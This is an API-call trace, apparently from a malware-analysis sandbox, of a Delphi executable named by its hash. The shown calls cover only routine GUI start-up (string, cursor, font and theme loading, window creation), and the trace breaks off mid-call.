[0091.406] ReleaseDC (hWnd=0x0, hDC=0x40106cc) returned 1 [0091.407] CreatePalette (plpal=0x19fb20) returned 0x150809aa [0091.407] GetStockObject (i=7) returned 0x1b00017 [0091.407] GetStockObject (i=5) returned 0x1900015 [0091.407] GetStockObject (i=13) returned 0x18a0048 [0091.407] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0091.407] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Alt+") returned 0x4 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Ctrl+") returned 0x5 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Shift+") returned 0x6 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Del") returned 0x3 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Ins") returned 0x3 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Down") returned 0x4 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Right") returned 0x5 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Up") returned 0x2 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Left") returned 0x4 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Home") returned 0x4 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="End") returned 0x3 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="PgDn") returned 0x4 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="PgUp") returned 0x4 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Space") returned 0x5 [0091.407] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Enter") returned 0x5 [0091.408] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Esc") returned 0x3 [0091.408] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Tab") returned 0x3 [0091.408] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="BkSp") returned 0x4 [0091.408] GetVersion () returned 0x23f00206 [0091.408] GetCurrentProcessId () returned 0x13ac [0091.408] GlobalAddAtomA (lpString="Delphi000013AC") returned 0xc0f2 [0091.408] GetCurrentThreadId () returned 0x13b0 [0091.408] GlobalAddAtomA (lpString="ControlOfs00400000000013B0") returned 0xc0f1 [0091.408] RegisterClipboardFormatA (lpszFormat="ControlOfs00400000000013B0") returned 0xc1db [0091.408] GetProcAddress (hModule=0x743d0000, lpProcName="GetMonitorInfoA") returned 0x743e7e40 [0091.409] GetProcAddress (hModule=0x743d0000, lpProcName="GetSystemMetrics") returned 0x743e9160 [0091.409] GetSystemMetrics (nIndex=19) returned 1 [0092.071] GetSystemMetrics (nIndex=75) returned 1 [0092.071] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2210e58, fWinIni=0x0 | out: pvParam=0x2210e58) returned 1 [0092.072] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0092.072] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0092.072] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x800db [0092.074] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0092.074] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0092.074] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0092.075] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x8036b [0092.076] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x130243 [0092.076] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x7028d [0092.077] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0xd0245 [0092.078] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0xc02a9 [0092.079] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x5014b [0092.080] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0092.080] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0092.081] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0092.081] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0092.081] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0092.081] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0092.081] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0092.081] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0092.081] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0092.081] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0092.081] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0092.081] GetDC (hWnd=0x0) returned 0x40106cc [0092.082] GetDeviceCaps (hdc=0x40106cc, index=90) returned 96 [0092.082] ReleaseDC (hWnd=0x0, hDC=0x40106cc) returned 1 [0092.082] GetProcAddress (hModule=0x743d0000, lpProcName="EnumDisplayMonitors") returned 0x74408d90 [0092.082] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x461d40, dwData=0x22110a4) returned 1 [0092.082] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x19fe87, fWinIni=0x0 | out: pvParam=0x19fe87) returned 1 [0092.083] CreateFontIndirectA (lplf=0x19fe87) returned 0x280a06dc [0092.083] GetObjectA (in: h=0x280a06dc, c=60, pv=0x19fc78 | out: pv=0x19fc78) returned 60 [0092.083] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x19fd33, fWinIni=0x0 | out: pvParam=0x19fd33) returned 1 [0092.091] CreateFontIndirectA (lplf=0x19fe0f) returned 0x230a09b3 [0092.091] GetObjectA (in: h=0x230a09b3, c=60, pv=0x19fc78 | out: pv=0x19fc78) returned 60 [0092.092] CreateFontIndirectA (lplf=0x19fdd3) returned 0x470a0977 [0092.092] GetObjectA (in: h=0x470a0977, c=60, pv=0x19fc78 | out: pv=0x19fc78) returned 60 [0092.092] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x70105 [0092.093] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x19fde0, nSize=0x100 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe")) returned 0x62 [0092.095] OemToCharA (in: pSrc="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe", pDst=0x19fde0 | out: pDst="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe") returned 1 [0092.096] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x21d0000 [0092.096] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x19fd98 | out: lpWndClass=0x19fd98) returned 0 [0092.097] RegisterClassA (lpWndClass=0x4a504c) returned 0xc1dc [0092.097] GetSystemMetrics (nIndex=0) returned 1440 [0092.097] GetSystemMetrics (nIndex=1) returned 900 [0092.097] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x8023e [0093.071] SetWindowLongA (hWnd=0x8023e, nIndex=-4, dwNewLong=35459055) returned 4224784 [0093.072] SendMessageA (hWnd=0x8023e, Msg=0x80, wParam=0x1, lParam=0x70105) returned 0x0 [0093.073] NtdllDefWindowProc_A (hWnd=0x8023e, Msg=0x80, wParam=0x1, lParam=0x70105) returned 0x0 [0093.077] SetClassLongA (hWnd=0x8023e, nIndex=-14, dwNewLong=459013) returned 0x0 [0093.080] GetSystemMenu (hWnd=0x8023e, bRevert=0) returned 0x1e0395 [0093.106] DeleteMenu (hMenu=0x1e0395, uPosition=0xf030, uFlags=0x0) returned 1 [0093.106] DeleteMenu (hMenu=0x1e0395, uPosition=0xf000, uFlags=0x0) returned 1 [0093.106] DeleteMenu (hMenu=0x1e0395, uPosition=0xf010, uFlags=0x0) returned 1 [0093.107] GetKeyboardLayoutList (in: nBuff=64, lpList=0x19fd68 | out: lpList=0x19fd68) returned 1 [0093.108] GetModuleHandleA (lpModuleName="USER32") returned 0x743d0000 [0093.109] GetProcAddress (hModule=0x743d0000, lpProcName="AnimateWindow") returned 0x743f8ef0 [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfed3, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Window Text") returned 0xb [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfed2, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Window Frame") returned 0xc [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfed1, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Window Background") returned 0x11 [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfed0, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="3D Light") returned 0x8 [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfeef, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="3D Dark Shadow") returned 0xe [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfeee, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Scroll Bar") returned 0xa [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfeed, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="None") returned 0x4 [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfeec, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Menu Text") returned 0x9 [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfeeb, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Menu Background") returned 0xf [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfeea, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Info Text") returned 0x9 [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfee9, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Info Background") returned 0xf [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfee8, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfee7, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Inactive Caption") returned 0x10 [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfee6, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Inactive Border") returned 0xf [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfee5, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Highlight Text") returned 0xe [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfee4, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Highlight Background") returned 0x14 [0093.110] LoadStringA (in: hInstance=0x400000, uID=0xfee3, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Gray Text") returned 0x9 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfee2, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Default") returned 0x7 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfee1, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Caption Text") returned 0xc [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfee0, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Button Text") returned 0xb [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfeff, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Button Shadow") returned 0xd [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfefe, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Button Highlight") returned 0x10 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfefd, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Button Face") returned 0xb [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfefc, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Background") returned 0xa [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfefb, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Application Workspace") returned 0x15 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfefa, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Active Caption") returned 0xe [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfef9, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Active Border") returned 0xd [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfef8, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Medium Gray") returned 0xb [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfef7, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Cream") returned 0x5 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfef6, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Sky Blue") returned 0x8 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfef5, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Money Green") returned 0xb [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfef4, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="White") returned 0x5 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfef3, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Aqua") returned 0x4 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfef2, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Fuchsia") returned 0x7 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfef1, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Blue") returned 0x4 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xfef0, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Yellow") returned 0x6 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xff0f, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Lime") returned 0x4 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xff0e, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Red") returned 0x3 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xff0d, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Silver") returned 0x6 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xff0c, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Gray") returned 0x4 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Teal") returned 0x4 [0093.111] LoadStringA (in: hInstance=0x400000, uID=0xff0a, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Purple") returned 0x6 [0093.112] LoadStringA (in: hInstance=0x400000, uID=0xff09, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Navy") returned 0x4 [0093.112] LoadStringA (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Olive") returned 0x5 [0093.112] LoadStringA (in: hInstance=0x400000, uID=0xff07, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Green") returned 0x5 [0093.112] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Maroon") returned 0x6 [0093.112] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x19ef1c, cchBufferMax=4096 | out: lpBuffer="Black") returned 0x5 [0093.112] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc158 [0093.113] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc1e5 [0093.113] GetCurrentThreadId () returned 0x13b0 [0093.113] GlobalAddAtomA (lpString="WndProcPtr00400000000013B0") returned 0xc0f0 [0093.114] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1e4 [0093.114] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1e0 [0093.114] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6f990000 [0093.115] GetProcAddress (hModule=0x6f990000, lpProcName="InitializeFlatSB") returned 0x6f9becf0 [0093.115] GetProcAddress (hModule=0x6f990000, lpProcName="UninitializeFlatSB") returned 0x6f9bef90 [0093.115] GetProcAddress (hModule=0x6f990000, lpProcName="FlatSB_GetScrollProp") returned 0x6f9bbf70 [0093.116] GetProcAddress (hModule=0x6f990000, lpProcName="FlatSB_SetScrollProp") returned 0x6f9be6f0 [0093.116] GetProcAddress (hModule=0x6f990000, lpProcName="FlatSB_EnableScrollBar") returned 0x6f9bbd70 [0093.116] GetProcAddress (hModule=0x6f990000, lpProcName="FlatSB_ShowScrollBar") returned 0x6f9bea50 [0093.116] GetProcAddress (hModule=0x6f990000, lpProcName="FlatSB_GetScrollRange") returned 0x6f9bc0e0 [0093.116] GetProcAddress (hModule=0x6f990000, lpProcName="FlatSB_GetScrollInfo") returned 0x6f9bbe20 [0093.116] GetProcAddress (hModule=0x6f990000, lpProcName="FlatSB_GetScrollPos") returned 0x6f9bbf10 [0093.117] GetProcAddress (hModule=0x6f990000, lpProcName="FlatSB_SetScrollPos") returned 0x6f9be660 [0093.117] GetProcAddress (hModule=0x6f990000, lpProcName="FlatSB_SetScrollInfo") returned 0x6f9be590 [0093.117] GetProcAddress (hModule=0x6f990000, lpProcName="FlatSB_SetScrollRange") returned 0x6f9be960 [0093.117] GetModuleHandleA (lpModuleName="User32.dll") returned 0x743d0000 [0093.117] GetProcAddress (hModule=0x743d0000, lpProcName="SetLayeredWindowAttributes") returned 0x7440cbc0 [0093.117] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc06e [0093.118] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x74dc0000 [0093.118] GetProcAddress (hModule=0x74dc0000, lpProcName="CoCreateInstanceEx") returned 0x76375bc0 [0093.118] GetProcAddress (hModule=0x74dc0000, lpProcName="CoInitializeEx") returned 0x763088d0 [0093.118] GetProcAddress (hModule=0x74dc0000, lpProcName="CoAddRefServerProcess") returned 0x76380d30 [0093.118] GetProcAddress (hModule=0x74dc0000, lpProcName="CoReleaseServerProcess") returned 0x76383950 [0093.118] GetProcAddress (hModule=0x74dc0000, lpProcName="CoResumeClassObjects") returned 0x763898c0 [0093.119] GetProcAddress (hModule=0x74dc0000, lpProcName="CoSuspendClassObjects") returned 0x762f2d80 [0093.119] CoInitialize (pvReserved=0x0) returned 0x0 [0093.129] GetCurrentThreadId () returned 0x13b0 [0093.129] ResetEvent (hEvent=0x208) returned 1 [0093.129] GetCurrentThreadId () returned 0x13b0 [0093.129] GetCurrentThreadId () returned 0x13b0 [0093.129] GetCurrentThreadId () returned 0x13b0 [0093.129] ResetEvent (hEvent=0x208) returned 1 [0093.129] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fd68, fWinIni=0x0 | out: pvParam=0x19fd68) returned 1 [0093.129] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fd68, fWinIni=0x0 | out: pvParam=0x19fd68) returned 1 [0093.129] GetSystemMetrics (nIndex=49) returned 16 [0093.129] GetSystemMetrics (nIndex=50) returned 16 [0093.130] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fdb0, fWinIni=0x0 | out: pvParam=0x19fdb0) returned 1 [0093.130] IsWindowVisible (hWnd=0x8023e) returned 0 [0093.130] GetCurrentThreadId () returned 0x13b0 [0093.130] VirtualQuery (in: lpAddress=0x4a0c68, lpBuffer=0x19fc80, dwLength=0x1c | out: lpBuffer=0x19fc80*(BaseAddress=0x4a0000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0093.131] FindResourceA (hModule=0x400000, lpName="TForm1", lpType=0xa) returned 0x4b9b70 [0093.131] FindResourceA (hModule=0x400000, lpName="TForm1", lpType=0xa) returned 0x4b9b70 [0093.131] LoadResource (hModule=0x400000, hResInfo=0x4b9b70) returned 0x4f98d8 [0093.131] SizeofResource (hModule=0x400000, hResInfo=0x4b9b70) returned 0x16ad [0093.131] LockResource (hResData=0x4f98d8) returned 0x4f98d8 [0093.131] GetCurrentThreadId () returned 0x13b0 [0093.131] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fa2c, fWinIni=0x0 | out: pvParam=0x19fa2c) returned 1 [0093.131] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x19fa2c, fWinIni=0x0 | out: pvParam=0x19fa2c) returned 1 [0093.133] LoadLibraryA (lpLibFileName="uxtheme.dll") returned 0x72cb0000 [0093.133] GetProcAddress (hModule=0x72cb0000, lpProcName="OpenThemeData") returned 0x72cd4b00 [0093.133] GetProcAddress (hModule=0x72cb0000, lpProcName="CloseThemeData") returned 0x72cd3f40 [0093.133] GetProcAddress (hModule=0x72cb0000, lpProcName="DrawThemeBackground") returned 0x72ce0630 [0093.133] GetProcAddress (hModule=0x72cb0000, lpProcName="DrawThemeText") returned 0x72ce20f0 [0093.134] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeBackgroundContentRect") returned 0x72ce00b0 [0093.134] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeBackgroundContentRect") returned 0x72ce00b0 [0093.134] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemePartSize") returned 0x72ce03f0 [0093.134] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeTextExtent") returned 0x72ce6640 [0093.134] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeTextMetrics") returned 0x72ce7ea0 [0093.134] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeBackgroundRegion") returned 0x72ce4340 [0093.135] GetProcAddress (hModule=0x72cb0000, lpProcName="HitTestThemeBackground") returned 0x72d0a730 [0093.135] GetProcAddress (hModule=0x72cb0000, lpProcName="DrawThemeEdge") returned 0x72d09310 [0093.135] GetProcAddress (hModule=0x72cb0000, lpProcName="DrawThemeIcon") returned 0x72d093b0 [0093.135] GetProcAddress (hModule=0x72cb0000, lpProcName="IsThemePartDefined") returned 0x72ce1b40 [0093.135] GetProcAddress (hModule=0x72cb0000, lpProcName="IsThemeBackgroundPartiallyTransparent") returned 0x72cdff80 [0093.135] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeColor") returned 0x72ce5130 [0093.136] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeMetric") returned 0x72d09fa0 [0093.136] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeString") returned 0x72d0a130 [0093.136] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeBool") returned 0x72ce9600 [0093.136] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeInt") returned 0x72ce4b70 [0093.136] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeEnumValue") returned 0x72ce4ab0 [0093.136] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemePosition") returned 0x72ce87e0 [0093.137] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeFont") returned 0x72ce7740 [0093.137] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeRect") returned 0x72d0a050 [0093.138] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeMargins") returned 0x72ce4680 [0093.138] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeIntList") returned 0x72d09f30 [0093.138] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemePropertyOrigin") returned 0x72cdfe40 [0093.138] GetProcAddress (hModule=0x72cb0000, lpProcName="SetWindowTheme") returned 0x72ce7f30 [0093.138] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeFilename") returned 0x72d09ec0 [0093.138] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeSysColor") returned 0x72d0a240 [0093.139] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeSysColorBrush") returned 0x72d0a2e0 [0093.139] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeSysBool") returned 0x72d0a1a0 [0093.139] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeSysSize") returned 0x72d0a590 [0093.139] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeSysFont") returned 0x72d0a380 [0093.139] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeSysString") returned 0x72d0a620 [0093.139] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeSysInt") returned 0x72d0a510 [0093.140] GetProcAddress (hModule=0x72cb0000, lpProcName="IsThemeActive") returned 0x72ce3fd0 [0093.140] GetProcAddress (hModule=0x72cb0000, lpProcName="IsAppThemed") returned 0x72ce4660 [0093.140] GetProcAddress (hModule=0x72cb0000, lpProcName="GetWindowTheme") returned 0x72d0a6c0 [0093.140] GetProcAddress (hModule=0x72cb0000, lpProcName="EnableThemeDialogTexture") returned 0x72ce77d0 [0093.140] GetProcAddress (hModule=0x72cb0000, lpProcName="IsThemeDialogTextureEnabled") returned 0x72d0a8e0 [0093.140] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeAppProperties") returned 0x72ce8dd0 [0093.141] GetProcAddress (hModule=0x72cb0000, lpProcName="SetThemeAppProperties") returned 0x72d0acb0 [0093.141] GetProcAddress (hModule=0x72cb0000, lpProcName="GetCurrentThemeName") returned 0x72ce8a10 [0093.141] GetProcAddress (hModule=0x72cb0000, lpProcName="GetThemeDocumentationProperty") returned 0x72d09e30 [0093.141] GetProcAddress (hModule=0x72cb0000, lpProcName="DrawThemeParentBackground") returned 0x72ce7860 [0093.141] GetProcAddress (hModule=0x72cb0000, lpProcName="EnableTheming") returned 0x72d096a0 [0093.141] GetFileVersionInfoSizeA (in: lptstrFilename="comctl32.dll", lpdwHandle=0x19fa78 | out: lpdwHandle=0x19fa78) returned 0x71c [0093.177] VirtualAlloc (lpAddress=0x2214000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2214000 [0093.178] GetFileVersionInfoA (in: lptstrFilename="comctl32.dll", dwHandle=0x0, dwLen=0x71c, lpData=0x2213ee0 | out: lpData=0x2213ee0) returned 1 [0093.178] VerQueryValueA (in: pBlock=0x2213ee0, lpSubBlock="\\", lplpBuffer=0x19fa70, puLen=0x19fa6c | out: lplpBuffer=0x19fa70*=0x2213f08, puLen=0x19fa6c) returned 1 [0093.178] VirtualFree (lpAddress=0x2214000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0093.186] IsAppThemed () returned 0x1 [0093.187] IsThemeActive () returned 0x1 [0093.187] GetDC (hWnd=0x0) returned 0x40106cc [0093.187] MoveToEx (in: hdc=0x40106cc, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.187] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3 [0093.187] CreateFontIndirectA (lplf=0x19f6d0) returned 0x280a099c [0093.187] SelectObject (hdc=0x40106cc, h=0x280a099c) returned 0x18a0048 [0093.187] GetSysColor (nIndex=8) returned 0x0 [0093.187] SetTextColor 